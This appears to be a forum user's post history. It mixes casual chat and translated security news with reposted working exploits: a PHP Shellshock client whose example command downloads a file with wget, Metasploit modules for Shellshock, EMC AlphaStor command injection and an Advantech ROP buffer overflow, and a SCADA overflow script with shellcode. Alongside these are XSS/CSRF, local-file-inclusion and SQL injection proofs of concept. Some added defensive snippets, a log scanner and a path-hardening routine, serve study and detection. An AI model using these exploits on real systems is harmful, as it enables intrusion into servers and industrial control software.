Everything posted by Aerosol (Posts: 3453, Days Won: 22)
-
The site is pretty decent, nice theme, the content is pretty decent (I only skimmed it, since it's not my thing), it runs very fast, you haven't piled 1000 pieces of junk onto it and the colours aren't garish either. Good luck with the site!
-
)) Bro, your English is really bad... right is: "working, but you're noob", link working man
-
Only 1 buzz every 10 seconds + hardly anyone uses Y!M anymore, everyone has given up on it! Stop sending me pointless PMs + what I wanted to point out is that nobody uses Y!M anymore.
-
Bro, do you realize how many idiots would rather lose a finger than miss the latest iPhone "model"... off// the iPhone X is barely out and they're already advertising the Z (P.S. it's just an example)
-
The developers of one of the most advanced open source operating systems for penetration testing, Kali Linux, announced yesterday the release of a new Kali project, known as NetHunter, that runs on Google Nexus devices. Kali Linux is an open source Debian-based operating system for penetration testing and forensics, maintained and funded by Offensive Security, a provider of information security training and penetration testing services. It ships with a collection of penetration testing and network monitoring tools used for testing software privacy and security. After establishing itself in hacker and security circles, Kali Linux has now been published as Kali NetHunter, a version of the security suite for Android devices. The tool is a mobile distribution designed to compromise systems over USB when installed and run on an Android phone. The Kali NetHunter project brings much of that power to Nexus users: anyone running the NetHunter platform can launch Teensy-style keyboard attacks over USB HID (human interface device), BadUSB man-in-the-middle (MITM) networking attacks in which the phone enumerates as a USB network adapter, wireless 802.11 frame injection, and one-click evil access points. NetHunter is currently available for Nexus devices only, but builds for other Android devices are likely on the way. NetHunter contains a full Kali Linux toolset, including support for self-destruction, software defined radio and the ability to launch a Kali desktop VNC session on the Nexus phone. The tools are designed for an attacker who has physical access to a device, whether an insider or someone who gains access through social engineering, tailgating and the like. On one hand, Teensy keyboard attacks can be used to automatically elevate privileges on a Windows PC and install a reverse-HTTP tunnel to a remote workstation.
On the other hand, BadUSB can force a Windows PC to recognize the USB-connected phone as a network adapter and re-route all of the PC's traffic through it for monitoring. Additionally, the Kali NetHunter configuration interface helps users manage complex configuration files through a local web interface, which together with 802.11 wireless injection and a pre-configured VPN service makes it a "formidable network security tool or discrete drop box – with Kali Linux at the tip of your fingers wherever you are." The Kali NetHunter open source security platform supports Nexus 10 and Nexus 7 tablets and Nexus 5 phones, and is built on the existing Kali (formerly BackTrack) Linux platform. The official Kali NetHunter images can be downloaded from the Offensive Security NetHunter download page. Source
-
The Daily Dot has obtained emails showing that Apple knew about security weaknesses in its iCloud service several months before hundreds of nude photos of celebrities, stolen from their personal accounts, appeared online. The emails show a discussion between a London-based security researcher, Ibrahim Balic, and Apple employees. In the discussion, Balic says he found a way to bypass iCloud's security and could carry out "attacks" on accounts. The method relies on guessing a large number of passwords with the help of automated software. Although the method used by the hackers involved in the celebrity photo scandal is unknown, security experts say "brute force" methods were used, combined with targeted "phishing" attacks (tricking users into being redirected to suspicious pages at a different URL). Balic sent his first email to Apple in March and continued the discussion with the company's security staff until 6 May. Although not all of the exchanged emails have been disclosed, The Daily Dot reports that at this point "the vulnerability apparently remains unresolved". The email sent to Balic suggests that Apple wanted to learn more about the weakness: "Hi Ibrahim, using the information you provided, it looks like it would take a very long time to find a valid authentication token for an account. Do you believe you have a method for accessing an account in a reasonable amount of time?" A similar flaw was pointed out by the tech site The Next Web after the publication of the personal photos of celebrities Jennifer Lawrence, Kate Upton and Ariana Grande. The company denied that the problem was related to the account break-ins.
Later, Apple acknowledged that the accounts in question had been "compromised", but said the fault lay with the security practices users follow. "None of the cases we investigated occurred as a result of a breach of any Apple system, including iCloud or Find my iPhone", the company stated on 1 September. "We continue to work with law enforcement to help identify the criminals involved." The company's response was criticized by experts, who consider that Apple had a duty to its customers and that large tech companies should not assume the average user is aware of security best practices. Moreover, if the recently published emails prove legitimate, Apple should give users an explanation of the company's reaction to the possible problems and flaws reported, The Independent notes. "If Apple had taken this problem seriously, maybe such problems would not have appeared", Ibrahim told the Daily Dot. Source
-
Symantec is making the Data Breach Risk Calculator available to organizations, a tool that lets companies estimate the impact of a security breach on their business and the losses they could suffer in the event of a cyber attack. The calculator estimates an organization's level of exposure to security breaches and the probability that a breach will affect the company in the next 12 months, and gives an estimate of the cost per lost record as well as the total losses the company would suffer in a breach. The Data Breach Risk Calculator is based on industry trends and data collected by Symantec since 2005, when the research company Ponemon Institute began examining the losses incurred by organizations across various industries as a result of security breaches. The risk of breaches and loss of confidential data keeps rising: at present a breach generates, on average, losses of 5.5 million dollars for a company, with a cost of 194 dollars per compromised confidential record, according to a study carried out last year by the Ponemon Institute. The calculator consists of 13 questions and, based on the answers a company provides, determines the risk that a security breach will occur in the organization and the estimated cost of data loss in the event of a security incident, helping organizations understand the risks they are exposed to and obtain information to prevent breaches. The Data Breach Risk Calculator is available worldwide and reports in local currency for companies in Australia, France, Italy, India, Germany, Japan, the United Kingdom and the US, while organizations elsewhere can calculate the estimated value of losses from a security breach in dollars. The Data Breach Risk Calculator can be accessed here. Source
-
People make mistakes, none of us were born knowing everything; instead of criticizing, try to do something constructive... So what if the guy has been around since 2007, maybe he didn't know what and how, you shouldn't judge him.
-
You need to put a capital letter at the beginning, e.g.: Password + numbers / (Password123)
-
The theme is quite nice, good luck with the site... @Lazx, you too, stop bickering for no reason.
-
They did the right thing, what do you expect from a bunch of kids...
-
You'd have to be completely sick in the head to pay 50 million on a phone.
-
1. Sherlock 2. NCIS Something like these...
-
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
           GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code :
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/

error_reporting(0);

if(!defined('STDIN')) die("Please run it through command-line!\n");

$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c'])) {
    die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}

$url = $x['u'];
$cmd = $x['c'];

// The web server exports the User-Agent header as HTTP_USER_AGENT in the CGI
// environment. A vulnerable bash imports the "() { :;}" function definition
// and keeps executing what follows it, i.e. the attacker's command.
$context = stream_context_create(
    array(
        'http' => array(
            'method' => 'GET',
            'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
        )
    )
);

$req = file_get_contents($url, false, $context);

// When the injected command runs before the CGI prints its headers, the
// server answers with a 500, which is the only success signal this client has.
if(!$req && strpos($http_response_header[0],"500") > 0 )
    die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
    die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
    die("A connection error occurred!\n");
?>

Source
-
Exploit Database Note: The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Like "real" programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

The patch used to fix this flaw ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

Source
-
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'bashedCgi',
      'Description' => %q{
        Quick & dirty module to send the BASH exploit payload (CVE-2014-6271)
        to CGI scripts that are BASH-based or invoke BASH, to execute an
        arbitrary shell command.
      },
      'Author'      => [
        'Stephane Chazelas',                      # vuln discovery
        'Shaun Colley <scolley at ioactive.com>'  # metasploit module
      ],
      'License'     => MSF_LICENSE,
      'References'  => [
        [ 'CVE', '2014-6271' ]
      ],
      'Targets'     => [ [ 'cgi', {} ] ],
      'DefaultTarget' => 0,
      'Payload'     => { 'Space' => 1024, 'DisableNops' => true },
      'DefaultOptions' => { 'PAYLOAD' => 0 }
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
        OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
      ], self.class)
  end

  def run
    # The User-Agent header becomes HTTP_USER_AGENT in the CGI environment;
    # a vulnerable bash runs whatever follows the "() { :;};" function stub.
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => datastore['TARGETURI'],
      'agent'  => "() { :;}; " + datastore['CMD']
    })

    if res && res.code == 200
      print_good("Command sent - 200 received")
    else
      print_error("Command sent - non-200 response")
    end
  end
end

Source
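The three Shellshock posts above (the PHP client, the Red Hat excerpt and the Metasploit module) all deliver the same thing: an HTTP header whose value starts with "() {", which the CGI server exports into bash's environment. The following is an added example and is not code from any of those posts or from the projects they describe. It shows the defender's side: a Python scanner that parses combined-format access log lines (the log layout is assumed; adjust the regex to your LogFormat) and flags the function-definition prefix in the fields the web server records. The sample log lines are constructed for the example.

```python
import re
from typing import Dict, Iterable, List, Optional

# Apache/nginx "combined" access-log layout (assumed). Quoted fields may
# contain backslash-escaped quotes, hence the (?:[^"\\]|\\.)* groups.
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<user_agent>(?:[^"\\]|\\.)*)"'
)

# An unpatched bash imports any environment variable whose value begins with
# "() {" as a function and keeps executing what follows the closing "};".
# Matching that prefix is a detection heuristic, not a bash parser.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Request fields a CGI server copies into the environment (HTTP_USER_AGENT,
# HTTP_REFERER, REQUEST_URI). Cookies and custom headers are exported too,
# but a combined log does not record them, so payloads there are missed.
INSPECTED_FIELDS = ("user_agent", "referer", "request")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None when the
    line does not match (truncated or foreign-format lines are skipped)."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def shellshock_hits(entry: Dict[str, str]) -> List[Dict[str, str]]:
    """One finding per inspected field that carries the "() {" prefix."""
    hits = []
    for field in INSPECTED_FIELDS:
        value = entry.get(field, "")
        if SHELLSHOCK_RE.search(value):
            # Everything after the first "};" is the injected command.
            _, _, injected = value.partition("};")
            hits.append({
                "client": entry["client"],
                "time": entry["time"],
                "field": field,
                "payload": injected.strip(),
                "request": entry["request"],
            })
    return hits


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Scan log lines in order and collect every Shellshock finding."""
    findings = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        findings.extend(shellshock_hits(entry))
    return findings


# Constructed sample lines, not real traffic. The second mirrors the
# User-Agent the PHP client above sends; the third carries the Metasploit
# module's default command in the Referer instead.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/hello HTTP/1.1" '
    '200 21 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:02:12 +0000] "GET /cgi-bin/hello HTTP/1.1" '
    '500 0 "-" "() { :;}; /bin/bash -c \\"wget http://example.invalid/x -O /tmp/x\\""',
    '198.51.100.7 - - [25/Sep/2014:10:02:13 +0000] "GET /cgi-bin/hello HTTP/1.1" '
    '200 21 "() { :; }; /usr/bin/touch /tmp/metasploit" "curl/7.37.0"',
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%s %s via %s: %s" % (f["time"], f["client"], f["field"], f["payload"]))
```

A 500 next to a hit is worth noting when triaging: as the PHP client's comment explains, a command that runs before the CGI emits its headers makes the server return 500, so status code plus prefix together separate a successful injection from a scanner that only probed.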
-
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
      'Description'    => %q{
        This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing
        the 0x75 command, the process does not properly filter user supplied input
        allowing for arbitrary command injection. This module has been tested
        successfully on EMC AlphaStor 4.0 build 116 with Windows 2003 SP2 and
        Windows 2008 R2.
      },
      'Author'         => [
        'Anyway <Aniway.Anyway[at]gmail.com>',               # Vulnerability Discovery
        'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
        'Mohsan Farid <faridms[at]gmail.com>',               # msf module
        'Brent Morris <inkrypto[at]gmail.com>',              # msf module
        'juan vazquez'                                       # convert aux module into exploit
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2013-0928'],
        ['ZDI', '13-033']
      ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        => { 'Space' => 2048, 'DisableNops' => true },
      'Targets'        => [
        [ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
      ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 18 2013'))

    register_options([ Opt::RPORT(3000) ], self.class)
  end

  def check
    packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
    res = send_packet(packet)
    if res && res =~ /Could not fork command/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    execute_cmdstager({ :linemax => 487 })
  end

  def execute_command(cmd, opts)
    padding = rand_text_alpha_upper(489 - cmd.length)
    packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
    connect
    sock.put(packet)
    begin
      sock.get_once
    rescue EOFError
      fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
    end
    disconnect
  end

  def execute_cmdstager_begin(opts)
    if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
      cmd_list.each do |cmd|
        cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
      end
    end
  end

  def send_packet(packet)
    connect
    sock.put(packet)
    begin
      meta_data = sock.get_once(8)
    rescue EOFError
      meta_data = nil
    end

    unless meta_data
      disconnect
      return nil
    end

    code, length = meta_data.unpack("N*")
    unless code == 1
      disconnect
      return nil
    end

    begin
      data = sock.get_once(length)
    rescue EOFError
      data = nil
    ensure
      disconnect
    end

    data
  end
end

Source
-
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability in Advantech WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7
        SP1 with IE8 and IE 9.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Unknown',      # Vulnerability discovery
        'juan vazquez'  # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-2364'],
        ['ZDI', '14-255'],
        ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
      ],
      'DefaultOptions' => {
        'Retries' => false,
        'InitialAutoRunScript' => 'migrate -f'
      },
      'BrowserRequirements' => {
        :source  => /script|headers/i,
        :os_name => Msf::OperatingSystems::WINDOWS,
        :ua_name => /MSIE/i,
        :ua_ver  => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
        :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
        :method  => "GetColor"
      },
      'Payload'        => {
        'Space'       => 1024,
        'DisableNops' => true,
        'BadChars'    => "\x00\x0a\x0d\x5c",
        # Patch the stack to execute the decoder...
        'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
        # Fix the stack again, this time better, before the payload
        # is executed.
        'Prepend'     => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                         "\x83\xC0\x08" +             # add eax, byte 8
                         "\x8b\x20" +                 # mov esp, [eax]
                         "\x81\xC4\x30\xF8\xFF\xFF"   # add esp, -2000
      },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        => [
        [ 'Automatic', { } ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 17 2014'))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")

    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS

    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end

  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61)  # offset
    xpl << [0x60014185].pack("V")     # RET
    xpl << rand_text_alphanumeric(8)

    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V")     # POP ECX # RETN
    xpl << [0xffffffff].pack("V")     # ecx value
    xpl << [0x6002157e].pack("V")     # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V")     # eax value
    xpl << [0x60022b97].pack("V")     # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V")     # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V")     # POP EBP # RETN
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << [0x60029f6c].pack("V")     # .data ijl11.dll
    xpl << [0x60012288].pack("V")     # POP ECX # RETN
    xpl << [0x60023588].pack("V")     # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V")     # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret

    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V")     # POP ECX # RETN
    xpl << [0xffffffff].pack("V")     # ecx value
    xpl << [0x6002157e].pack("V")     # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V")     # eax value
    xpl << [0x60022b97].pack("V")     # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V")     # MUL EAX,ECX # RETN 0x10

    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V")     # POP EAX # RETN
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << rand_text_alphanumeric(4)  # padding
    xpl << [0x60029f6c].pack("V")     # .data ijl11.dll
    xpl << [0x60012288].pack("V")     # POP ECX # RETN
    xpl << [0xffffffff].pack("V")     # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V")   # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end

    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V")     # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V")     # ptr to &VirtualAlloc() [IAT ijl11.dll]

    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V")     # POP EBP # RETN
    xpl << [0x6002054b].pack("V")     # ptr to &(# pop ebp # retn)

    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V")     # POP ESI # RETN
    xpl << [0x6002176e].pack("V")     # ptr to &(# jmp[eax])

    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V")     # POP EDI # RETN
    xpl << [0x60021ad2].pack("V")     # ptr to &(retn)

    # ESP = lpAddress (automatic)

    # PUSHAD # RETN
    xpl << [0x60018399].pack("V")     # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V")     # ptr to &(# push esp # retn)
    xpl << code

    xpl.gsub!("\"", "\\\"")  # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\")  # Escape back slash, to avoid javascript escaping

    xpl
  end
end

Source
-
## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
## Date: 09/23/2014
## Author: Pedro Sánchez
## Version: 1.83 (English)
## Tested on: Windows 7 embedded.
## Notified the vendor, vendor never responded.
## In the new version this PoC stops working
## Vendor: Novus
## http://www.novus.com.br
## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation

import os
import socket
import sys

## The process listens on TCP port 2001
if len(sys.argv) != 3:
    print " Usage: %s <host> <port>" % sys.argv[0]
    sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])

print " PoC WS10 Data Server SCADA Exploit "
print " Pedro Sanchez "

## Shellcode: pushes the string "calc" and calls a hardcoded library address to spawn calc.exe
shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90")

## Exploit constructor: filler up to the overwritten control data, a short jump, two hardcoded
## addresses for the tested Windows 7 embedded build, a NOP sled and the shellcode
ws10 = ("\x90" * 1024 + "\x44" * 31788)
ws10 += ("\xeb\x14")
ws10 += ("\x44" * 6)
ws10 += ("\xad\xbb\xc3\x77")
ws10 += ("\xb4\x73\xed\x77")
ws10 += ("\x90" * 21)
ws10 += shellcode

print " [+] Sending payload..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(ws10)
data = s.recv(1024)
print " [+] Closing..."
s.close()
print " [+] Done!"

Source
-
Details
================
Software: Login Widget With Shortcode
Version: 3.1.1
Homepage: http://wordpress.org/plugins/login-sidebar-widget/
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)

Description
================
CSRF/XSS vulnerability in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do

Vulnerability
================
This plugin is vulnerable to a combined CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page. Using that ability they can use JavaScript to control an admin user's browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.

Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript.) Note what the form lacks and what the payload does: there is no nonce field, and the value closes the textarea the setting is echoed back into, so a missing CSRF token and unescaped output combine into markup injection in the admin screen.

<form method="POST" action="http://localhost/wp-admin/options-general.php?page=login_widget_afo">
  <input type="text" name="custom_style_afo" value="</textarea><script>alert(1)</script>">
  <input type="text" name="option" value="login_widget_afo_save_settings">
  <input type="submit">
</form>

Mitigations
================
Upgrade to version 3.2.1 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2014-08-26: Discovered
2014-09-15: Reported to vendor by email
2014-09-15: Vendor reported the issue fixed and a new version released
2014-09-17: Published

Discovered by dxw:
================
Tom Adams

Please visit security.dxw.com for more information.

Source
-
Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031

Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/

Description
-----------
A local file inclusion vulnerability was discovered in OsClass, an open source project for building classifieds sites. The appearance page of the administration interface (oc-admin) takes the template to render from the "file" request parameter, and a traversal sequence in that parameter walks out of the theme directory.

Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:

http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd

Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed: https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2

Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.

About Netsparker
----------------
Netsparker can find and report security issues and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on. Netsparker's unique detection and exploitation techniques allow it to be dead accurate in reporting, hence it is the first and only false-positive-free web application security scanner. For more information on Netsparker visit https://www.netsparker.com.

Source
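The PoC URL works because the "file" parameter is joined onto the theme path and handed to include() without checking where the normalised result lands. The block below is an added example, not OsClass's code (and written in Python rather than PHP so it runs stand-alone): the unchecked pattern next to a hardened resolver that keeps the result inside the theme directory and restricts it to template files. The theme directory path and the ".php" allow-list are assumptions; the payload is the one from the advisory.

```python
import posixpath
from typing import Optional, Tuple

# Assumed theme directory for the example (not taken from the advisory).
THEME_ROOT = "/var/www/osclass/oc-content/themes/bender"
# The advisory's payload.
POC_FILE = "../../../../../../../../../../etc/passwd"


def unchecked_resolve(root: str, requested: str) -> str:
    """The vulnerable pattern: glue the parameter onto the theme path and let
    the include target be whatever the result normalises to."""
    return posixpath.normpath(posixpath.join(root, requested))


def resolve_template(root: str, requested: str,
                     allowed_ext: Tuple[str, ...] = (".php",)) -> Optional[str]:
    """Hardened form: return an absolute path only if it stays inside root and
    names a template-looking file; otherwise None (the caller answers 404).

    The check is lexical, so it needs no filesystem and runs anywhere. On a
    real host follow it with os.path.realpath() so that a symlink inside the
    theme directory cannot point back out of it.
    """
    root = root.rstrip("/")
    if "\x00" in requested:
        return None                         # old PHP truncated include paths at NUL
    requested = requested.replace("\\", "/")  # Windows separators traverse too
    if requested.startswith("/") or (len(requested) > 1 and requested[1] == ":"):
        return None                         # absolute path or drive letter
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if not candidate.startswith(root + "/"):
        return None                         # escaped the theme directory
    if not candidate.endswith(allowed_ext):
        return None                         # not a template file
    return candidate


if __name__ == "__main__":
    print("unchecked:", unchecked_resolve(THEME_ROOT, POC_FILE))
    print("hardened: ", resolve_template(THEME_ROOT, POC_FILE))
    print("hardened: ", resolve_template(THEME_ROOT, "header.php"))
```

The normalisation step is the point: ten "../" segments against a six-deep root collapse to "/etc/passwd", which is exactly what the vulnerable include receives, while the hardened version rejects anything whose normalised form no longer has the theme root as a prefix.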
-
=== Details === Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/ Affected Product: Cart Engine Version: 3.0 === Executive Summary === SQL Injection: Using a specially crafted HTTP request, it is possible to exploit a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters of cart.php page. Successful exploitation of the vulnerabilities results in read sensitive data from the database and, in some cases, execute administration operation on the database or issue commands to the operating system. Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization[2] of multiple pages output which includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user's session trough a “Reflected XSS”. Open Redirect: Using a specially crafted HTTP request, it is possible to redirect[3] the normal browsing of users to a malicious site by modifying untrusted URL input in Referer HTTP header parameter in index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scam, user credential theft, malware dissemination. === Proof of Concept === = SQL Injection (based on MySQL) = A SQL Injection vulnerability has been detected on cart.php page in Cart Engine CMS. The function “sql_query” in file “cart.php” doesn’t sanitize the “$item_id” parameter, so error based and boolean-based blind or time-based blind SQL Injection attacks can be executed. 
